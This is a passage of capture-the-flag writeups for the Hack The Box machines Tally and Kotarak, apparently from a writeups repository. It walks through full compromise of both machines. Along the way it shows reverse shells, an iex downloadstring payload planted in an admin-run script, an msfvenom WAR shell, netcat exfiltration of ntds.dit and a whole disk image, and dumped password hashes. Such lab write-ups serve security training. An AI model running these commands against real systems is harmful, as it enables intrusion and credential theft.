SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
**SeImpersonatePrivilege Impersonate a client after authentication Enabled**
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
NULL
(13 rows affected, return status = 0)
And here we see that the SeImpersonatePrivilege is set to enabled therefore we should be able to do rottenpotato on this machine, but before that let's get a reverse shell using nishang's [InvokePowershellTcp.ps1](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1)
[ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
→ wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
--2020-12-23 17:21:02-- https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.36.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.36.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4339 (4.2K) [text/plain]
Saving to: Invoke-PowerShellTcp.ps1
Invoke-PowerShellTcp.ps1 100%[=======================================>] 4.24K --.-KB/s in 0s
2020-12-23 17:21:02 (21.8 MB/s) - Invoke-PowerShellTcp.ps1 saved [4339/4339]
[ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
→ echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.6 -Port 9001' >> Invoke-PowerShellTcp.ps1
[ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
→ cat Invoke-PowerShellTcp.ps1 | tail -n2
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.6 -Port 9001
[ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
→ cat Invoke-PowerShellTcp.ps1 | tail -n5
Write-Error $_
}
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.6 -Port 9001
[ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
→ mv Invoke-PowerShellTcp.ps1 rev9001.ps1
` ![](prg/6/7.png) ![](prg/6/8.png)
[ 10.10.14.6/23 ] [ /dev/pts/25 ] [~/_HTB/Tally]
→ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.59] 56942
Windows PowerShell running as user Sarah on TALLY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
tally\sarah
PS C:\Windows\system32> cd /
PS C:\> cd Users
PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 18/09/2017 22:35 .NET v2.0
d----- 18/09/2017 22:35 .NET v2.0 Classic
d----- 30/08/2017 01:14 .NET v4.5
d----- 30/08/2017 01:14 .NET v4.5 Classic
d----- 17/09/2017 21:33 Administrator
d----- 18/09/2017 22:35 Classic .NET AppPool
d-r--- 21/11/2016 01:24 Public
d----- 13/10/2017 23:57 Sarah
d----- 12/10/2017 21:28 SQLSERVERAGENT
d----- 02/09/2017 22:46 SQLTELEMETRY
d----- 13/09/2017 21:27 Tim
PS C:\Users> cd Sarah
PS C:\Users\Sarah> cd Desktop
PS C:\Users\Sarah\Desktop> dir
Directory: C:\Users\Sarah\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 01/10/2017 22:32 916 browser.bat
-a---- 17/09/2017 21:50 845 FTP.lnk
-a---- 23/09/2017 21:11 297 note to tim (draft).txt
-a---- 19/10/2017 21:49 17152 SPBestWarmUp.ps1
-a---- 19/10/2017 22:48 11010 SPBestWarmUp.xml
-a---- 17/09/2017 21:48 1914 SQLCMD.lnk
-a---- 21/09/2017 00:46 129 todo.txt
-ar--- 31/08/2017 02:04 32 user.txt
-a---- 17/09/2017 21:49 936 zz_Migration.lnk
PS C:\Users\Sarah\Desktop> type user.txt
beXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And there you go! We have been able to print out the user flag.
## **Part 3 : Getting Root Access**
Now in order to privesc on this box we need to first take a look at sarah's desktop files:
PS C:\Users\Sarah\Desktop> dir
Directory: C:\Users\Sarah\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 01/10/2017 22:32 916 browser.bat
-a---- 17/09/2017 21:50 845 FTP.lnk
-a---- 23/09/2017 21:11 297 note to tim (draft).txt
-a---- 19/10/2017 21:49 17152 SPBestWarmUp.ps1
-a---- 19/10/2017 22:48 11010 SPBestWarmUp.xml
-a---- 17/09/2017 21:48 1914 SQLCMD.lnk
-a---- 21/09/2017 00:46 129 todo.txt
-ar--- 31/08/2017 02:04 32 user.txt
-a---- 17/09/2017 21:49 936 zz_Migration.lnk
PS C:\Users\Sarah\Desktop> type "note to tim (draft).txt"
Hi Tim,
As discussed in the cybersec meeting, malware is often hidden in trusted executables in order to evade detection. I read somewhere that cmd.exe is a common target for backdooring, so I've gone ahead and disallowed any cmd.exe outside the Windows folder from executing.
Thanks,
Sarah
Basically here there are multiple ways to privesc, the first one being found in SPBestWarmUp.ps1 which basically is a script we can write to that is being executed every hour by the administrator account, so we're going to put in our second reverse shell payload:
PS C:\Users\Sarah\Desktop> echo "iex(new-object net.webclient).downloadstring('http://10.10.14.6:9005/rev9006.ps1')" > SPBestWarmUp.ps1
[ 10.10.14.6/23 ] [ /dev/pts/25 ] [~/_HTB/Tally]
→ nc -lvnp 9006
listening on [any] 9006 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.59] 56986
Windows PowerShell running as user Administrator on TALLY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Users\Sarah\Desktop>whoami
tally\administrator
PS C:\Users\Sarah\Desktop>cd C:\Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop>type root.txt
60XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And there we have it!
## **Conclusion**
Here we can see the progress graph :
![](img/7_graph.png)

628
Hard/7.md Normal file
View file

@ -0,0 +1,628 @@
# Kotarak Writeup
![](img/6.png)
## Introduction :
Kotarak is a hard linux box released back in september 2017.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.6/23 ] [ /dev/pts/2 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.55 --max-retries 0 -Pn --min-rate=500 | grep Discovered
[sudo] password for nothing:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Discovered open port 8080/tcp on 10.10.10.55
Discovered open port 22/tcp on 10.10.10.55
Discovered open port 8009/tcp on 10.10.10.55
Discovered open port 60000/tcp on 10.10.10.55
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.6/23 ] [ /dev/pts/2 ] [~]
→ sudo nmap -sCV -p8080,22,8009,60000 10.10.10.55
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-21 22:50 CET
Nmap scan report for 10.10.10.55
Host is up (0.034s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e2:d7:ca:0e:b7:cb:0a:51:f7:2e:75:ea:02:24:17:74 (RSA)
| 256 e8:f1:c0:d3:7d:9b:43:73:ad:37:3b:cb:e1:64:8e:e9 (ECDSA)
|_ 256 6d:e9:26:ad:86:02:2d:68:e1:eb:ad:66:a0:60:17:b8 (ED25519)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
| Supported methods: GET HEAD POST PUT DELETE OPTIONS
| Potentially risky methods: PUT DELETE
|_ See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp open http Apache Tomcat 8.5.5
|_http-favicon: Apache Tomcat
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-title: Apache Tomcat/8.5.5 - Error report
60000/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Kotarak Web Hosting
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.68 seconds
## **Part 2 : Getting User Access**
As our nmap scan points out, port 8080 seems to be interesting so let's investigate it:
![](prg/7/1.png)
Most apache tomcat services have an important directory in /manager/html as you can see:
![](prg/7/2.png)
Now here you can't bruteforce the password here because the service will block the account so let's keep poking around another port that our nmap scan picked up:
![](prg/7/3.png)
and here we get an interesting page with a url prompt so we're going to use burpsuite's repeater on it:
![](prg/7/4.png) ![](prg/7/5.png) ![](prg/7/6.png)
So here we see there's a regex that matches the word file so we can't print out the files on the machine, next is we try if we can find local ports:
![](prg/7/6.png)
It works for port 60000 but we know that already, let's use wfuzz to enumerate:
[ 10.10.14.6/23 ] [ /dev/pts/7 ] [~/_HTB/Kotarak]
→ wfuzz -c -z range,1-65535 http://10.10.10.55:60000/url.php\?path\=http://localhost:FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.55:60000/url.php?path=http://localhost:FUZZ
Total requests: 65535
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 2 L 0 W 2 Ch "1"
000000039: 200 2 L 0 W 2 Ch "39"
000000015: 200 2 L 0 W 2 Ch "15"
000000003: 200 2 L 0 W 2 Ch "3"
000000007: 200 2 L 0 W 2 Ch "7"
000000031: 200 2 L 0 W 2 Ch "31"
000000034: 200 2 L 0 W 2 Ch "34"
000000033: 200 2 L 0 W 2 Ch "33"
000000030: 200 2 L 0 W 2 Ch "30"
000000029: 200 2 L 0 W 2 Ch "29"
000000032: 200 2 L 0 W 2 Ch "32"
000000028: 200 2 L 0 W 2 Ch "28"[ 10.10.14.6/23 ] [ /dev/pts/18 ] [~]
→ msfvenom -l payloads
000000038: 200 2 L 0 W 2 Ch "38"
000000027: 200 2 L 0 W 2 Ch "27"
000000023: 200 2 L 0 W 2 Ch "23"
000000024: 200 2 L 0 W 2 Ch "24"
000000025: 200 2 L 0 W 2 Ch "25"
000000026: 200 2 L 0 W 2 Ch "26"
000000022: 200 4 L 4 W 62 Ch "22"
000000021: 200 2 L 0 W 2 Ch "21"
000000020: 200 2 L 0 W 2 Ch "20"
000000014: 200 2 L 0 W 2 Ch "14"
000000017: 200 2 L 0 W 2 Ch "17"
000000018: 200 2 L 0 W 2 Ch "18"
000000019: 200 2 L 0 W 2 Ch "19"
000000016: 200 2 L 0 W 2 Ch "16"
000000013: 200 2 L 0 W 2 Ch "13"
000000012: 200 2 L 0 W 2 Ch "12"
000000008: 200 2 L 0 W 2 Ch "8"
000000011: 200 2 L 0 W 2 Ch "11"
000000009: 200 2 L 0 W 2 Ch "9"
000000006: 200 2 L 0 W 2 Ch "6"
000000010: 200 2 L 0 W 2 Ch "10"
000000005: 200 2 L 0 W 2 Ch "5"
000000002: 200 2 L 0 W 2 Ch "2"
000000054: 200 2 L 0 W 2 Ch "54"
000000004: 200 2 L 0 W 2 Ch "4"
000000042: 200 2 L 0 W 2 Ch "42"
000000046: 200 2 L 0 W 2 Ch "46"
here we can see the junk responses that are only 2 responses characters long, therefore we're going to filter out the 2 chars long responses with the option --hl=2 :
[ 10.10.14.6/23 ] [ /dev/pts/7 ] [~/_HTB/Kotarak]
→ wfuzz -c -z range,1-65535 --hl=2 http://10.10.10.55:60000/url.php\?path\=http://localhost:FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.55:60000/url.php?path=http://localhost:FUZZ
Total requests: 65535
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000022: 200 4 L 4 W 62 Ch "22"
000000090: 200 11 L 18 W 156 Ch "90"
000000110: 200 17 L 24 W 187 Ch "110"
000000200: 200 3 L 2 W 22 Ch "200"
000000320: 200 26 L 109 W 1232 Ch "320"
000000888: 200 78 L 265 W 3955 Ch "888"
Total time: 262.3381
Processed Requests: 54927
Filtered Requests: 54921
Requests/sec.: 209.3748
/usr/lib/python3/dist-packages/wfuzz/wfuzz.py:78: UserWarning:Fatal exception: Pycurl error 28: Operation timed out after 90000 milliseconds with 0 bytes received
So here we have a few interesting responses : port 22, 90, 110, 200, 320, and 888. you would have to test each one of them but the important one right now is 888:
![](prg/7/8.png)
Do ctrl+U to view sourcecode:
![](prg/7/9.png)
and navigate to ?doc=backup:
![](prg/7/10.png)
select url and CTRL+U to url encode it:
![](prg/7/11.png)
and we found some credentials ! admin:3@g01PdhB! So let's try to login on the tomcat login page we found earlier at http://10.10.10.55:8080/manager/html
![](prg/7/12.png)
And we now have access to the tomcat web manager, From here we want to upload a malicious WAR file to get us a shell.
[ 10.10.14.6/23 ] [ /dev/pts/18 ] [~]
→ msfvenom -l payloads | grep java
java/jsp_shell_bind_tcp Listen for a connection and spawn a command shell
java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
java/meterpreter/bind_tcp Run a meterpreter server in Java. Listen for a connection
java/meterpreter/reverse_http Run a meterpreter server in Java. Tunnel communication over HTTP
java/meterpreter/reverse_https Run a meterpreter server in Java. Tunnel communication over HTTPS
java/meterpreter/reverse_tcp Run a meterpreter server in Java. Connect back stager
java/shell/bind_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Listen for a connection
java/shell/reverse_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager
java/shell_reverse_tcp Connect back to attacker and spawn a command shell
Here we want msvenom's java/jsp_shell_reverse_tcp
[ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Kotarak]
→ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.6 LPORT=9090 -f war > ippsecrocks.war
Payload size: 1093 bytes
Final size of war file: 1093 bytes
[ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Kotarak]
→ l
total 12K
drwxr-xr-x 2 nothing nothing 4.0K Dec 22 14:17 .
drwxr-xr-x 5 nothing nothing 4.0K Dec 21 17:43 ..
-rw-r--r-- 1 nothing nothing 1.1K Dec 22 14:17 ippsecrocks.war
` ![](prg/7/13.png) ![](prg/7/14.png)
Now that we got a shell, let's upgrade it to a fully interactive shell:
[ 10.10.14.6/23 ] [ /dev/pts/15 ] [~]
→ nc -lvnp 9090
listening on [any] 9090 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.55] 42176
id
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
tomcat@kotarak-dmz:/$ ^Z
[1] + 257499 suspended nc -lvnp 9090
[ 10.10.14.6/23 ] [ /dev/pts/15 ] [~]
→ stty raw -echo ; fg
[1] + 257499 continued nc -lvnp 9090
tomcat@kotarak-dmz:/$
What you need to remember to get a fully interactive reverse shell is the following:
python -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z (or ^Z)
stty raw -echo ; fg
export TERM=screen-256color
export SHELL=bash
stty rows 40 columns 125
reset
And now here we have a shell that we can clear, auto-complete and use vi from.
tomcat@kotarak-dmz:/$ id
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
tomcat@kotarak-dmz:/$ ls -lash backups/
total 12K
4.0K drwxr-xr-x 3 root root 4.0K Jul 21 2017 .
4.0K drwxr-xr-x 27 root root 4.0K Aug 29 2017 ..
4.0K drwxr-xr-x 2 root root 4.0K Jul 21 2017 backups
tomcat@kotarak-dmz:/$ ls -lash backups/backups/
total 12K
4.0K drwxr-xr-x 2 root root 4.0K Jul 21 2017 .
4.0K drwxr-xr-x 3 root root 4.0K Jul 21 2017 ..
4.0K -rw-r----- 1 root root 2.3K Jul 12 2017 tomcat-users.xml
tomcat@kotarak-dmz:/$ cat backups/backups/tomcat-users.xml
cat: backups/backups/tomcat-users.xml: Permission denied
tomcat@kotarak-dmz:/$ ls -lash /home
total 16K
4.0K drwxr-xr-x 4 root root 4.0K Jul 21 2017 .
4.0K drwxr-xr-x 27 root root 4.0K Aug 29 2017 ..
4.0K drwxr-xr-x 4 atanas atanas 4.0K Aug 29 2017 atanas
4.0K drwxr-xr-x 3 tomcat tomcat 4.0K Jul 21 2017 tomcat
tomcat@kotarak-dmz:/$ ls -lash /home/tomcat/
total 12K
4.0K drwxr-xr-x 3 tomcat tomcat 4.0K Jul 21 2017 .
4.0K drwxr-xr-x 4 root root 4.0K Jul 21 2017 ..
4.0K drwxr-xr-x 3 tomcat tomcat 4.0K Jul 21 2017 to_archive
tomcat@kotarak-dmz:/$ ls -lash /home/tomcat/to_archive/
total 12K
4.0K drwxr-xr-x 3 tomcat tomcat 4.0K Jul 21 2017 .
4.0K drwxr-xr-x 3 tomcat tomcat 4.0K Jul 21 2017 ..
4.0K drwxr-xr-x 2 tomcat tomcat 4.0K Jul 21 2017 pentest_data
tomcat@kotarak-dmz:/$ ls -lash /home/tomcat/to_archive/pentest_data/
total 28M
4.0K drwxr-xr-x 2 tomcat tomcat 4.0K Jul 21 2017 .
4.0K drwxr-xr-x 3 tomcat tomcat 4.0K Jul 21 2017 ..
17M -rw-r--r-- 1 tomcat tomcat 17M Jul 21 2017 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit
12M -rw-r--r-- 1 tomcat tomcat 12M Jul 21 2017 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin
Here after poking around a bit we found psexec ntds .dit and .bin files, which are normally found on windows active directory controllers, and it's what contains a windows active directory informations (policies, users, and most importantly passwords.) so let's get these files into our local machine:
_Terminal 1:_
nc 10.10.14.6 9093 < file.bin
nc 10.10.14.6 9094 < file.dit
` _Terminal 2:_
[ 10.10.14.6/23 ] [ /dev/pts/15 ] [~/_HTB/Kotarak]
→ nc -lvnp 9093 > SYSTEM
listening on [any] 9093 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.55] 48340
[ 10.10.14.6/23 ] [ /dev/pts/15 ] [~/_HTB/Kotarak]
→ nc -lvnp 9094 > ntds.dit
listening on [any] 9094 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.55] 32822
[ 10.10.14.6/23 ] [ /dev/pts/15 ] [~/_HTB/Kotarak]
→ file *
ntds.dit: Extensible storage engine DataBase, version 0x620, checksum 0x16d44752, page size 8192, DirtyShutdown, Windows version 6.1
SYSTEM: MS Windows registry file, NT/2000 or above
Now that we have what we needed, let's use impacket to dump the secrets using both files:
[ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Kotarak]
→ impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x14b6fb98fedc8e15107867c4722d1399
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: d77ec2af971436bccb3b6fc4a969d7ff
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-3G2B0H151AC$:1000:aad3b435b51404eeaad3b435b51404ee:668d49ebfdb70aeee8bcaeac9e3e66fd:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ca1ccefcb525db49828fbb9d68298eee:::
WIN2K8$:1103:aad3b435b51404eeaad3b435b51404ee:160f6c1db2ce0994c19c46a349611487:::
WINXP1$:1104:aad3b435b51404eeaad3b435b51404ee:6f5e87fd20d1d8753896f6c9cb316279:::
WIN2K31$:1105:aad3b435b51404eeaad3b435b51404ee:cdd7a7f43d06b3a91705900a592f3772:::
WIN7$:1106:aad3b435b51404eeaad3b435b51404ee:24473180acbcc5f7d2731abe05cfa88c:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:6c53b16d11a496d0535959885ea7c79c04945889028704e2a4d1ca171e4374e2
Administrator:aes128-cts-hmac-sha1-96:e2a25474aa9eb0e1525d0f50233c0274
Administrator:des-cbc-md5:75375eda54757c2f
WIN-3G2B0H151AC$:aes256-cts-hmac-sha1-96:84e3d886fe1a81ed415d36f438c036715fd8c9e67edbd866519a2358f9897233
WIN-3G2B0H151AC$:aes128-cts-hmac-sha1-96:e1a487ca8937b21268e8b3c41c0e4a74
WIN-3G2B0H151AC$:des-cbc-md5:b39dc12a920457d5
WIN-3G2B0H151AC$:rc4_hmac:668d49ebfdb70aeee8bcaeac9e3e66fd
krbtgt:aes256-cts-hmac-sha1-96:14134e1da577c7162acb1e01ea750a9da9b9b717f78d7ca6a5c95febe09b35b8
krbtgt:aes128-cts-hmac-sha1-96:8b96c9c8ea354109b951bfa3f3aa4593
krbtgt:des-cbc-md5:10ef08047a862046
krbtgt:rc4_hmac:ca1ccefcb525db49828fbb9d68298eee
WIN2K8$:aes256-cts-hmac-sha1-96:289dd4c7e01818f179a977fd1e35c0d34b22456b1c8f844f34d11b63168637c5
WIN2K8$:aes128-cts-hmac-sha1-96:deb0ee067658c075ea7eaef27a605908
WIN2K8$:des-cbc-md5:d352a8d3a7a7380b
WIN2K8$:rc4_hmac:160f6c1db2ce0994c19c46a349611487
WINXP1$:aes256-cts-hmac-sha1-96:347a128a1f9a71de4c52b09d94ad374ac173bd644c20d5e76f31b85e43376d14
WINXP1$:aes128-cts-hmac-sha1-96:0e4c937f9f35576756a6001b0af04ded
WINXP1$:des-cbc-md5:984a40d5f4a815f2
WINXP1$:rc4_hmac:6f5e87fd20d1d8753896f6c9cb316279
WIN2K31$:aes256-cts-hmac-sha1-96:f486b86bda928707e327faf7c752cba5bd1fcb42c3483c404be0424f6a5c9f16
WIN2K31$:aes128-cts-hmac-sha1-96:1aae3545508cfda2725c8f9832a1a734
WIN2K31$:des-cbc-md5:4cbf2ad3c4f75b01
WIN2K31$:rc4_hmac:cdd7a7f43d06b3a91705900a592f3772
WIN7$:aes256-cts-hmac-sha1-96:b9921a50152944b5849c706b584f108f9b93127f259b179afc207d2b46de6f42
WIN7$:aes128-cts-hmac-sha1-96:40207f6ef31d6f50065d2f2ddb61a9e7
WIN7$:des-cbc-md5:89a1673723ad9180
WIN7$:rc4_hmac:24473180acbcc5f7d2731abe05cfa88c
atanas:aes256-cts-hmac-sha1-96:933a05beca1abd1a1a47d70b23122c55de2fedfc855d94d543152239dd840ce2
atanas:aes128-cts-hmac-sha1-96:d1db0c62335c9ae2508ee1d23d6efca4
atanas:des-cbc-md5:6b80e391f113542a
[*] Cleaning up...
Out of these hashes we want the following:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
it's quite odd to have windows stuff on that linux machine, so let's see which machines our reverse shell'd machine can talk to / is currently talking to:
tomcat@kotarak-dmz:/home/tomcat/to_archive/pentest_data$ arp -a
? (10.0.3.133) at 00:16:3e:c9:bd:b1 [ether] on lxcbr0
? (10.10.10.2) at 00:50:56:b9:35:90 [ether] on eth0
tomcat@kotarak-dmz:/home/tomcat/to_archive/pentest_data$ nc -v 10.0.3.133 22
Connection to 10.0.3.133 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2
However it seems like the box kotarak is talking to isn't a windows machine. Therefore we'll need to crack the hashes we got
[ 10.10.14.6/23 ] [ /dev/pts/15 ] [~/_HTB/Kotarak]
→ vim hashes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
[ 10.10.14.6/23 ] [ /dev/pts/15 ] [~/_HTB/Kotarak]
→ awk -F: '{print $4}' hashes
e64fe0f24ba2489c05e64354d74ebd11
2b576acbe6bcfda7294d6bd18041b8fe
` ![](prg/7/162.png) ![](prg/7/17.png)
And we have credentials ! we found the Passwords Password123! and f16tomcat! so let's login as atanas via ssh:
[ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Kotarak]
→ ssh atanas@10.10.10.55
atanas@10.10.10.55's password:
Permission denied, please try again.
atanas@10.10.10.55's password:
We can't so we're going to go from our previous reverse shell and su there.
![](prg/7/18.png)
tomcat@kotarak-dmz:/$
tomcat@kotarak-dmz:/$ su - atanas
Password: f16tomcat!
atanas@kotarak-dmz:~$ ls -l
total 4
-rw-rw---- 1 atanas atanas 33 Jul 19 2017 user.txt
atanas@kotarak-dmz:~$ cat user.txt
93XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And we have the user flag!
## **Part 3 : Getting Root Access**
To get the root flag we need to first check the groups the user is into:
atanas@kotarak-dmz:~$ id
uid=1000(atanas) gid=1000(atanas) groups=1000(atanas),4(adm),6(disk),24(cdrom),30(dip),34(backup),46(plugdev),115(lpadmin),116(sambashare)
atanas@kotarak-dmz:~$ ps -ef | grep lxc
root 914 1 0 Dec21 ? 00:00:00 /usr/bin/lxcfs /var/lib/lxcfs/
lxc-dns+ 1381 1 0 Dec21 ? 00:00:00 dnsmasq -u lxc-dnsmasq --strict-order --bind-interfaces --pid-file=/run/lxc/dnsmasq.pid --listen-address 10.0.3.1 --dhcp-range 10.0.3.2,10.0.3.254 --dhcp-lease-max=253 --dhcp-no-override --except-interface=lo --interface=lxcbr0 --dhcp-leasefile=/var/lib/misc/dnsmasq.lxcbr0.leases --dhcp-authoritative
root 1413 1 0 Dec21 ? 00:00:00 [lxc monitor] /var/lib/lxc kotarak-int
atanas 83412 83387 0 10:29 pts/2 00:00:00 grep --color=auto lxc
Here we see something odd, the user atanas is in the disk group, which means that he has access to the drives on this machine. Moreover doing ps -ef we see some lxc processes running, therefore it's safe to assume our next step is to look into the LXC container. But first let's poke around the disks since we should have access to them:
atanas@kotarak-dmz:~$ ls -lash /dev/sd*
0 brw-rw---- 1 root disk 8, 0 Dec 21 11:45 /dev/sda
0 brw-rw---- 1 root disk 8, 1 Dec 21 11:45 /dev/sda1
0 brw-rw---- 1 root disk 8, 2 Dec 21 11:45 /dev/sda2
0 brw-rw---- 1 root disk 8, 5 Dec 21 11:45 /dev/sda5
atanas@kotarak-dmz:~$ mount | grep root
/dev/mapper/Kotarak--vg-root on / type ext4 (rw,relatime,errors=remount-ro,data=ordered)
And here we're hinted at the mounted filesystem Kotarak--vg-root:
atanas@kotarak-dmz:~$ ls -lash /dev/mapper/Kotarak--vg-root
0 lrwxrwxrwx 1 root root 7 Dec 21 11:45 /dev/mapper/Kotarak--vg-root -> ../dm-0
And here we see that it's a symlink to /dev/dm-0:
atanas@kotarak-dmz:~$ ls -lash /dev/dm-0
0 brw-rw---- 1 root disk 252, 0 Dec 21 11:45 /dev/dm-0
strings /dev/dm-0
^C
running the strings command on dm-0 we see that we can actually read the file, therefore let's send it over to our local machine but first let's check if everything we need is there:
atanas@kotarak-dmz:~$ which dd
/bin/dd
atanas@kotarak-dmz:~$ which nc
/bin/nc
atanas@kotarak-dmz:~$ which gunzip
/bin/gunzip
Looks like it, so we're going to use dd to print out the contents of dm-0 pipe it into gunzip to get rid of the unused 0s and pipe it into netcat to send it back to our machine:
atanas@kotarak-dmz:~$ dd if=/dev/dm-0 | gzip -1 - | nc 10.10.14.6 9095
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Kotarak]
→ nc -lvnp 9095 > disk.img.gz
listening on [any] 9095 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.55] 56702
using gzip is going to compress the file for us to avoid downloading useless gigabytes filled with 0s
![](prg/7/19.png)
Wait for it to finish, since the compressed file is 2.2G and then decompress it locally (7.5Gigs)
[ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
→gunzip disk.img.gz
[ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
→ ls -lash disk.img
7.1G -rw-r--r-- 1 nothing nothing 7.0G Dec 22 16:44 disk.img
[ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
→ mkdir /mnt/kotarak
mkdir: cannot create directory /mnt/kotarak: Permission denied
[ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
→ sudo !!
[ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
→ sudo mkdir /mnt/kotarak
[sudo] password for nothing:
[ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
→ sudo mount disk.img /mnt/kotarak
[ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
→ cd /mnt/kotarak
[ 10.10.14.6/23 ] [ /dev/pts/20 ] [/mnt/kotarak]
→ ls -l
total 116
drwxr-xr-x 3 root root 4096 Jul 21 2017 backups
drwxr-xr-x 2 root root 4096 Jul 10 2017 bin
drwxr-xr-x 2 root root 4096 Jul 9 2017 boot
